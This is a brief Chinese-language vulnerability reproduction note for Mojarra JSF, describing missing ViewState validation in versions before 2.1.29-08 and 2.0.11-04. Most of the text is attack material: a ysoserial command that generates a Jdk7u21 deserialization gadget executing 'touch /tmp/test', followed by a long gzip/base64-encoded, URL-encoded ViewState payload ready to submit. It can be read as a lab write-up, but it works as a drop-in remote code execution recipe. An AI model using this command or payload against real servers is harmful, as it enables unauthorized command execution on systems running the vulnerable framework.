Mojarra JSF
JavaServer Faces (JSF)是一种用于构建 Web 应用程序的新标准 Java 框架,常见的同类型的框架,如Strut2,Yii(构建 Web 应用程序的php框架)等等等等。mojarra是JSF框架的一个实现一个产品
思路
在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行验证,所以我们可以在验证处按照对应加密规则放上我们想要执行的恶意命令
JSF中的ViewState也查不到,是用来验证,用来确保请求只发一次?
漏洞复现
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 "touch /tmp/test" | gzip | base64 -w 0
手动进行url编码
H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjNo3n2mdKWPKC7zTvBEW0epDU4JMJpKuGDGa8n9rbr3e3ubLJBojf%2bAITKnQNwaDj0QqsekCpuLRckJFBRJbhwAw4VEhce3%2bxu4igJtVu60u7Mfq/5vm9%2b8823%2bSvU2xZ0XqFrVHK4qklpVb/KChepXcow/oP2/Ts3Hg0cCwG4FrRUpAL%2b3bkPbnx85/ZIGPnmegIAms%2bdB/GE0OqrilGWbEeXDKsoUZMqJSa5VKO6pOqcWTrVJNfWuCJxi7rSMiubGuXMTuHYcHnxnr55czgMkRQ05lS9wHT%2bllPOMysFB3KooNsa4ymku1mI5/IbnClGgdkcwtnsTBYiOUWjNv62ZtPCbRmXLcqzgpZMQ31Op2WGzB28DLdUvYjMlpzhcNPhS5ZhMourwmiHLyhilyv0pGuKWP/Bx7G8hd/8q7u9WPxxXCRM8EJID2VnNh93/hmJLf8UkCOf3P/77lfIHoLJOIThxSiMR%2bF0FF4i0GwzS6XaCrNs1dAvpeYIkDcINM4aus2pzleo5rD6L3o%2bevzho99fIxCZUnWV4yTc179CoG4Ws0CgCbeR%2bflapnkNKa1pQ0GzFI3jf0Cs4yXVJnAww538cpDTJbqhGbRAIJHSdWZ5KWMoNJresA3fOdn0ZWw/IRdooci4fWofK0kCDd5mrRpWmYDVl0ZMyIgJGTEh%2b5iQPUzIW5iQPUzIc4sLyey%2b0mWtIuv7o77HLDkTTCnHvF2kekFjVlKkJFYwFKeM%2bCFw5qmWR9WSbwfDn/n/zhCIv%2b4qzBQ0Owq9BD57unxU9aDAy/Lc8sK0q9opJFFuWNWVasqhGpgTOHgWLwhEg1wSmH4emcwYjqWweVXAOBEgUBKHNAFxeCEKfQSGnwGwBM7XuiOWo3O1zOTpvI0QV/iWJQJtXrFQjYrz3mmbrNXylqVttBA4XiUW3KIpRQtKQUulqr3tOxmFAcwZCgb/BNr7%2btN7xJIJeAXOxOFlkLCGcMNRSj0yL5sylmUeg7NYMZjLFAK9fXsr5057WCMVhqU2gSVuWNgbwRKW4VS5ukDNoPgcqYS0tI6VZmhkeGJ0aHxwcmhwbJLAsfST%2bEk4ASEsnegRvoegHiI4RkXJhZhHQxTgV9xJMo4Ex/qB20BueSKN%2bI14RAkO4DfhC0ATTOCIFRHaUEoon8M3LGi7FYc9xR6fGSiKWTt0eHwCndCFGt04930UZg8HZlMedR%2bz457ZAZ%2b5r9kjcBQ1xOwYHMflKwvEoH876FPIEVJNn0OYpO%2bA3Dr4JYxevuUpjnlBESHR461/AlpwjCMrBCehGRqca3AdbQH5bvuqOiyuqvYodEahKwrdtV5V135Rf5sqX%2bh6PldVeN4w9lxNp6teTahVS9E4ROBkDaYw9ArUF/NXmPLfh77awX0ijkntOE7uwnGrxz/ofdt27G6H2F2TQx2eKctcJ%2bDa73uYOCr8dyWsw9L2jV1pytytJlHELFlsVcOgJTzm7sbPvQ97vmmefRACkgZS4rgdlewEknJKX8NN3VnDXRNbxCHRHm5Zo7pucE9Gmt6e7lG8dP%2bPpvYH1z8NQSgNiTITwPGQhm1a0442DQsNNnN1fMPERq9lTxPoLb%2bro0WV%2bujDe193vPstHo15iIvtmsfSbmDX2cBLFrNLhlZwzaDJTazHRMsr0schtjpKR%2bnY2QlxcmLumlUlo1B5XNP9F3iIUkOJCwAA
进入后台查看
|